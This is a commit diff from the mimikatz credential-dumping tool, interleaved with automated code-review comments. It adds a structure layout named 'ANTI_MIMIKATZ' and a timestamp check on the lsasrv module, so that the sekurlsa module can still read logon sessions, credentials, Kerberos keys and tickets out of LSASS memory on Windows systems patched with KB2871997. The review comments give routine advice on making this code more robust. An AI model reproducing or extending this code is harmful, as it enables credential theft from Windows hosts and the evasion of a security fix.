Structures for KB2871997 ;)
parent
ba14c8b425
commit
8d83d5ab93
|
@ -46,6 +46,7 @@ const KUHL_M_SEKURLSA_ENUM_HELPER lsassEnumHelpers[] = {
|
|||
{sizeof(KIWI_MSV1_0_LIST_52), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_52, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_60), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_60, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_61), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_62), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_62, CredentialManager)},
|
||||
{sizeof(KIWI_MSV1_0_LIST_63), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LocallyUniqueIdentifier), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, LogonType), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Session), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, UserName), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Domaine), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, Credentials), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, pSid), FIELD_OFFSET(KIWI_MSV1_0_LIST_63, CredentialManager)},
|
||||
};
|
||||
|
@ -306,9 +307,13 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
|
|||
else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_8)
|
||||
helper = &lsassEnumHelpers[3];
|
||||
else if(cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE)
|
||||
helper = &lsassEnumHelpers[4];
|
||||
else
|
||||
helper = &lsassEnumHelpers[5];
|
||||
else
|
||||
helper = &lsassEnumHelpers[6];
|
||||
|
||||
if((cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000))
|
||||
helper++; // yeah, really, I do that =)
|
||||
|
||||
|
||||
securityStruct.hMemory = cLsass.hLsassMem;
|
||||
securityStruct.address = LogonSessionListCount;
|
||||
|
@ -437,7 +442,6 @@ NTSTATUS kuhl_m_sekurlsa_pth(int argc, wchar_t * argv[])
|
|||
kull_m_string_args_byName(argc, argv, L"run", &szRun, L"cmd.exe");
|
||||
kprintf(L"user\t: %s\ndomain\t: %s\nprogram\t: %s\n", szUser, szDomain, szRun);
|
||||
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"aes128", &szAes128, NULL))
|
||||
{
|
||||
if(MIMIKATZ_NT_BUILD_NUMBER > KULL_M_WIN_MIN_BUILD_BLUE)
|
||||
|
@ -590,7 +594,7 @@ VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCred
|
|||
else if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST)
|
||||
{
|
||||
pHashPassword = (PKERB_HASHPASSWORD_GENERIC) mesCreds;
|
||||
kprintf(L"\t%s : ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
|
||||
kprintf(L"\t %s ", kuhl_m_kerberos_ticket_etype(pHashPassword->Type));
|
||||
if(buffer.Length = buffer.MaximumLength = (USHORT) pHashPassword->Size)
|
||||
{
|
||||
buffer.Buffer = (PWSTR) pHashPassword->Checksump;
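Review bot: The `0x53480000` in the new `helper++` guard of kuhl_m_sekurlsa_enum is a bare PE TimeDateStamp (seconds since the Unix epoch, roughly 11 April 2014) with nothing saying what it marks; name it next to the KULL_M_WIN_MIN_BUILD_* constants, e.g. `#define KULL_M_WIN_LSASRV_KB2871997_TIMESTAMP 0x53480000 /* lsasrv.dll builds after this date carry the KB2871997 logon-session layout */`. The same comparison treats 0 — the value kull_m_process_adjustTimeDateStamp stores when a module's headers cannot be read — as "older than the fix", so on a patched Windows 7/8 where the header read fails the pre-patch layout is silently chosen; testing `TimeDateStamp != 0` first and reporting the unknown case would avoid that guess. The `helper++` also hard-wires the order of lsassEnumHelpers (the `_61_ANTI_MIMIKATZ` entry added in the first hunk must stay right after `_61`, and presumably `_63` right after `_62` for the Windows 8 case), which deserves a comment on the table, e.g. `// order matters: kuhl_m_sekurlsa_enum steps to the next entry for post-KB2871997 lsasrv`. Both kuhl_m_sekurlsa_enum and the table start outside their hunks.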
|
||||
|
|
|
@ -149,6 +149,43 @@ typedef struct _KIWI_MSV1_0_LIST_61 {
|
|||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_61, *PKIWI_MSV1_0_LIST_61;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ {
|
||||
struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ *Blink;
|
||||
PVOID unk0;
|
||||
ULONG unk1;
|
||||
PVOID unk2;
|
||||
ULONG unk3;
|
||||
ULONG unk4;
|
||||
ULONG unk5;
|
||||
HANDLE hSemaphore6;
|
||||
PVOID unk7;
|
||||
HANDLE hSemaphore8;
|
||||
PVOID unk9;
|
||||
PVOID unk10;
|
||||
ULONG unk11;
|
||||
ULONG unk12;
|
||||
PVOID unk13;
|
||||
LUID LocallyUniqueIdentifier;
|
||||
LUID SecondaryLocallyUniqueIdentifier;
|
||||
BYTE waza[12]; /// to do (maybe align) <===================
|
||||
LSA_UNICODE_STRING UserName;
|
||||
LSA_UNICODE_STRING Domaine;
|
||||
PVOID unk14;
|
||||
PVOID unk15;
|
||||
PSID pSid;
|
||||
ULONG LogonType;
|
||||
ULONG Session;
|
||||
LARGE_INTEGER LogonTime; // autoalign x86
|
||||
LSA_UNICODE_STRING LogonServer;
|
||||
PKIWI_MSV1_0_CREDENTIALS Credentials;
|
||||
PVOID unk19;
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
ULONG unk22;
|
||||
PVOID CredentialManager;
|
||||
} KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, *PKIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ;
|
||||
|
||||
typedef struct _KIWI_MSV1_0_LIST_62 {
|
||||
struct _KIWI_MSV1_0_LIST_62 *Flink;
|
||||
struct _KIWI_MSV1_0_LIST_62 *Blink;
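Review bot: The `BYTE waza[12]` placeholder in KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ ends 4 bytes short of pointer alignment on x64, so there the compiler inserts padding before `UserName` (LSA_UNICODE_STRING holds a pointer) while on x86 it does not; whether that implicit padding matches lsasrv's real layout is exactly what the `to do (maybe align)` marker leaves open, and every FIELD_OFFSET in lsassEnumHelpers past that point depends on it. Since the layout was recovered from a specific lsasrv build, pin it: replace the `<====` marker with a comment naming that build and add `C_ASSERT(FIELD_OFFSET(KIWI_MSV1_0_LIST_61_ANTI_MIMIKATZ, UserName) == <expected offset per arch>);` so a compiler or SDK change cannot shift the table silently. The `// autoalign x86` remark on LogonTime shows per-arch alignment is already being tracked here, so the same note belongs on `waza`.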
|
||||
|
|
|
@ -5,7 +5,7 @@
|
|||
*/
|
||||
#include "kuhl_m_sekurlsa_credman.h"
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package = {L"credman", kuhl_m_sekurlsa_enum_logon_callback_credman, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_package = {L"credman", kuhl_m_sekurlsa_enum_logon_callback_credman, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_credman_single_package[] = {&kuhl_m_sekurlsa_credman_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_credman(int argc, wchar_t * argv[])
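Review bot: The only change to kuhl_m_sekurlsa_credman_package is a positional `0` slotted into the nested `Module.Informations` initializer, and the identical one-token edit is repeated in the dpapi, kerberos, livessp, msv, ssp, tspkg and wdigest sections below — presumably for the `ULONG TimeDateStamp` inserted into KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION in the header at the end of the page. Every one of those inner aggregates is all-NULL/0, which `{0}` already expresses and which stays valid whenever another member is inserted, so `{{0}, FALSE, FALSE}` in place of `{{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}` would have kept this commit to the header and the process code. If the explicit form is preferred for readability, a short comment naming the members in order (`/* DllBase, SizeOfImage, TimeDateStamp, Name */`) next to one of them would make the next insertion less error-prone.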
|
||||
|
|
|
@ -30,8 +30,8 @@ KULL_M_PATCH_GENERIC MasterKeyCacheReferences[] = {
|
|||
|
||||
PKIWI_MASTERKEY_CACHE_ENTRY pMasterKeyCacheList = NULL;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_lsa_package = {L"dpapi", NULL, FALSE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_svc_package = {L"dpapi", NULL, FALSE, L"dpapisrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_lsa_package = {L"dpapi", NULL, FALSE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_dpapi_svc_package = {L"dpapi", NULL, FALSE, L"dpapisrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_dpapi(int argc, wchar_t * argv[])
|
||||
{
|
||||
|
|
|
@ -126,7 +126,7 @@ const KERB_INFOS kerbHelper[] = {
|
|||
},
|
||||
};
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package = {L"kerberos", kuhl_m_sekurlsa_enum_logon_callback_kerberos, TRUE, L"kerberos.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_package = {L"kerberos", kuhl_m_sekurlsa_enum_logon_callback_kerberos, TRUE, L"kerberos.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_kerberos_single_package[] = {&kuhl_m_sekurlsa_kerberos_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_kerberos(int argc, wchar_t * argv[])
|
||||
|
@ -179,6 +179,8 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_tickets(IN PKIWI_BASIC_SECU
|
|||
PKIWI_KERBEROS_ENUM_DATA_TICKET ticketData = (PKIWI_KERBEROS_ENUM_DATA_TICKET) pOptionalData;
|
||||
DWORD i;
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
kuhl_m_sekurlsa_enum_kerberos_callback_passwords(pData, Localkerbsession, RemoteLocalKerbSession, NULL);
|
||||
kprintf(L"\n");
|
||||
for(i = 0; i < 3; i++)
|
||||
{
|
||||
kprintf(L"\n\tGroup %u - %s", i, KUHL_M_SEKURLSA_KERBEROS_TICKET_TYPE[i]);
|
||||
|
@ -194,7 +196,8 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_keys(IN PKIWI_BASIC_SECURIT
|
|||
if(RemoteLocalKerbSession.address = *(PVOID *) ((PBYTE) Localkerbsession.address + kerbHelper[KerbOffsetIndex].offsetKeyList))
|
||||
{
|
||||
kuhl_m_sekurlsa_printinfos_logonData(pData);
|
||||
kprintf(L"\n\tKey List @ %p\n", RemoteLocalKerbSession.address);
|
||||
kuhl_m_sekurlsa_enum_kerberos_callback_passwords(pData, Localkerbsession, RemoteLocalKerbSession, NULL);
|
||||
kprintf(L"\n\t * Key List :\n");
|
||||
if(aLocalKeyMemory.address = LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structKeyListSize))
|
||||
{
|
||||
if(kull_m_memory_copy(&aLocalKeyMemory, &RemoteLocalKerbSession, kerbHelper[KerbOffsetIndex].structKeyListSize))
|
||||
|
@ -391,7 +394,7 @@ void kuhl_m_sekurlsa_kerberos_enum_tickets(IN PKIWI_BASIC_SECURITY_LOGON_SESSION
|
|||
if(App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(pKiwiTicket))
|
||||
{
|
||||
if(kull_m_file_writeData(filename, (PBYTE) App_KrbCred, kull_m_asn1_getSize(App_KrbCred)))
|
||||
kprintf(L"\n\t * Saved to file %s !\n", filename);
|
||||
kprintf(L"\n\t * Saved to file %s !", filename);
|
||||
else PRINT_ERROR_AUTO(L"kull_m_file_writeData");
|
||||
LocalFree(App_KrbCred);
|
||||
}
|
||||
|
|
|
@ -18,7 +18,7 @@ KULL_M_PATCH_GENERIC LiveReferences[] = {
|
|||
|
||||
PKIWI_LIVESSP_LIST_ENTRY LiveGlobalLogonSessionList = NULL;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_package = {L"livessp", kuhl_m_sekurlsa_enum_logon_callback_livessp, FALSE, L"livessp.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_package = {L"livessp", kuhl_m_sekurlsa_enum_logon_callback_livessp, FALSE, L"livessp.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_livessp_single_package[] = {&kuhl_m_sekurlsa_livessp_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_livessp(int argc, wchar_t * argv[])
|
||||
|
|
|
@ -9,7 +9,7 @@ const ANSI_STRING
|
|||
PRIMARY_STRING = {7, 8, "Primary"},
|
||||
CREDENTIALKEYS_STRING = {14, 15, "CredentialKeys"};
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package = {L"msv", kuhl_m_sekurlsa_enum_logon_callback_msv, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_package = {L"msv", kuhl_m_sekurlsa_enum_logon_callback_msv, TRUE, L"lsasrv.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_msv_single_package[] = {&kuhl_m_sekurlsa_msv_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_msv(int argc, wchar_t * argv[])
|
||||
|
|
|
@ -23,7 +23,7 @@ KULL_M_PATCH_GENERIC SspReferences[] = {
|
|||
|
||||
PKIWI_SSP_CREDENTIAL_LIST_ENTRY SspCredentialList = NULL;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_package = {L"ssp", kuhl_m_sekurlsa_enum_logon_callback_ssp, TRUE, L"msv1_0.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_package = {L"ssp", kuhl_m_sekurlsa_enum_logon_callback_ssp, TRUE, L"msv1_0.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_ssp_single_package[] = {&kuhl_m_sekurlsa_ssp_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_ssp(int argc, wchar_t * argv[])
|
||||
|
|
|
@ -20,7 +20,7 @@ KULL_M_PATCH_GENERIC TsPkgReferences[] = {
|
|||
|
||||
PRTL_AVL_TABLE TSGlobalCredTable = NULL;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_package = {L"tspkg", kuhl_m_sekurlsa_enum_logon_callback_tspkg, TRUE, L"tspkg.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_package = {L"tspkg", kuhl_m_sekurlsa_enum_logon_callback_tspkg, TRUE, L"tspkg.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_tspkg_single_package[] = {&kuhl_m_sekurlsa_tspkg_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_tspkg(int argc, wchar_t * argv[])
|
||||
|
|
|
@ -27,7 +27,7 @@ KULL_M_PATCH_GENERIC WDigestReferences[] = {
|
|||
PKIWI_WDIGEST_LIST_ENTRY l_LogSessList = NULL;
|
||||
LONG offsetWDigestPrimary = 0;
|
||||
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_package = {L"wdigest", kuhl_m_sekurlsa_enum_logon_callback_wdigest, TRUE, L"wdigest.dll", {{{NULL, NULL}, 0, NULL}, FALSE, FALSE}};
|
||||
KUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_package = {L"wdigest", kuhl_m_sekurlsa_enum_logon_callback_wdigest, TRUE, L"wdigest.dll", {{{NULL, NULL}, 0, 0, NULL}, FALSE, FALSE}};
|
||||
const PKUHL_M_SEKURLSA_PACKAGE kuhl_m_sekurlsa_wdigest_single_package[] = {&kuhl_m_sekurlsa_wdigest_package};
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_wdigest(int argc, wchar_t * argv[])
|
||||
|
|
|
@ -78,6 +78,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
|||
moduleInformation.DllBase.address = pLdrEntry->DllBase;
|
||||
moduleInformation.SizeOfImage = pLdrEntry->SizeOfImage;
|
||||
moduleInformation.NameDontUseOutsideCallback = &pLdrEntry->BaseDllName;
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
status = STATUS_SUCCESS;
|
||||
|
@ -98,6 +99,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
|||
moduleName.Length = pLdrEntry32->BaseDllName.Length;
|
||||
moduleName.MaximumLength = pLdrEntry32->BaseDllName.MaximumLength;
|
||||
moduleName.Buffer = (PWSTR) pLdrEntry32->BaseDllName.Buffer;
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
status = STATUS_SUCCESS;
|
||||
|
@ -129,7 +131,10 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
|||
{
|
||||
aBuffer.address = moduleName.Buffer; aProcess.address = LdrEntry.BaseDllName.Buffer;
|
||||
if(kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
|
||||
{
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
LocalFree(moduleName.Buffer);
|
||||
}
|
||||
}
|
||||
|
@ -163,7 +168,10 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
|||
{
|
||||
aBuffer.address = moduleName.Buffer; aProcess.address = (PVOID) LdrEntry32.BaseDllName.Buffer;
|
||||
if(kull_m_memory_copy(&aBuffer, &aProcess, moduleName.MaximumLength))
|
||||
{
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
LocalFree(moduleName.Buffer);
|
||||
}
|
||||
}
|
||||
|
@ -185,6 +193,7 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
|||
if(pMinidumpString = (PMINIDUMP_STRING) kull_m_minidump_RVAtoPTR(memory->pHandleProcessDmp->hMinidump, pMinidumpModuleList->Modules[i].ModuleNameRva))
|
||||
{
|
||||
RtlInitUnicodeString(&moduleName, wcsrchr(pMinidumpString->Buffer, L'\\') + 1);
|
||||
kull_m_process_adjustTimeDateStamp(&moduleInformation);
|
||||
continueCallback = callBack(&moduleInformation, pvArg);
|
||||
}
|
||||
}
|
||||
|
@ -200,6 +209,17 @@ NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE mem
|
|||
return status;
|
||||
}
|
||||
|
||||
void kull_m_process_adjustTimeDateStamp(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION information)
|
||||
{
|
||||
PIMAGE_NT_HEADERS ntHeaders;
|
||||
if(kull_m_process_ntheaders(&information->DllBase, &ntHeaders))
|
||||
{
|
||||
information->TimeDateStamp = ntHeaders->FileHeader.TimeDateStamp;
|
||||
LocalFree(ntHeaders);
|
||||
}
|
||||
else information->TimeDateStamp = 0;
|
||||
}
|
||||
|
||||
BOOL CALLBACK kull_m_process_callback_moduleForName(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg)
|
||||
{
|
||||
if(((PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION_FOR_NAME) pvArg)->isFound = RtlEqualUnicodeString(pModuleInformation->NameDontUseOutsideCallback, ((PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION_FOR_NAME) pvArg)->name, TRUE))
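Review bot: kull_m_process_adjustTimeDateStamp folds "headers could not be read" into `TimeDateStamp = 0`, which its new consumer in kuhl_m_sekurlsa_enum then compares against a build-date threshold as if it were a real timestamp; returning the result of kull_m_process_ntheaders (`BOOL kull_m_process_adjustTimeDateStamp(...)` with `return FALSE;` on the else branch), or at least a comment `// 0 means the PE header was unreadable, not a 1970 build`, would let callers tell the two apart. The call is also inserted unconditionally before all five `callBack(&moduleInformation, pvArg)` invocations in kull_m_process_getVeryBasicModuleInformations, so every module's NT headers are fetched and freed even when the callback never looks at the field; if kull_m_process_ntheaders copies from the remote process or dump, as the LocalFree suggests, doing the lookup only where the value is needed (for instance once a name has matched in kull_m_process_callback_moduleForName) would keep the enumeration cost where it was. kull_m_process_getVeryBasicModuleInformations starts and ends outside these hunks.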
|
||||
|
|
|
@ -323,6 +323,7 @@ extern NTSTATUS WINAPI RtlCreateUserThread(IN HANDLE Process, IN OPTIONAL PSECUR
|
|||
typedef struct _KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION{
|
||||
KULL_M_MEMORY_ADDRESS DllBase;
|
||||
ULONG SizeOfImage;
|
||||
ULONG TimeDateStamp;
|
||||
PCUNICODE_STRING NameDontUseOutsideCallback;
|
||||
} KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION, *PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION;
|
||||
|
||||
|
@ -345,6 +346,7 @@ BOOL kull_m_process_getProcessIdForName(LPCWSTR name, PDWORD processId);
|
|||
|
||||
typedef BOOL (CALLBACK * PKULL_M_MODULE_ENUM_CALLBACK) (PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
|
||||
NTSTATUS kull_m_process_getVeryBasicModuleInformations(PKULL_M_MEMORY_HANDLE memory, PKULL_M_MODULE_ENUM_CALLBACK callBack, PVOID pvArg);
|
||||
void kull_m_process_adjustTimeDateStamp(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION information);
|
||||
BOOL CALLBACK kull_m_process_callback_moduleForName(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
|
||||
BOOL CALLBACK kull_m_process_callback_moduleFirst(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION pModuleInformation, PVOID pvArg);
|
||||
BOOL kull_m_process_getVeryBasicModuleInformationsForName(PKULL_M_MEMORY_HANDLE memory, PCWSTR name, PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION informations);
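Review bot: The new `ULONG TimeDateStamp` member of KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION carries no description of its source or of its failure value, and since it feeds a layout decision in kuhl_m_sekurlsa_enum that matters; suggested: `ULONG TimeDateStamp; // FileHeader.TimeDateStamp of the module's NT headers (seconds since the Unix epoch); 0 when the headers could not be read`. The prototype for kull_m_process_adjustTimeDateStamp added in the second hunk is the place for the matching one-liner, e.g. `// Fills information->TimeDateStamp from the module's NT headers; stores 0 on failure`. Inserting the member in the middle of the struct rather than appending it is what forced the initializer edits in every package file on this page; if that ordering is deliberate, a comment saying so would stop the next maintainer from "fixing" it.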
|
||||
|
|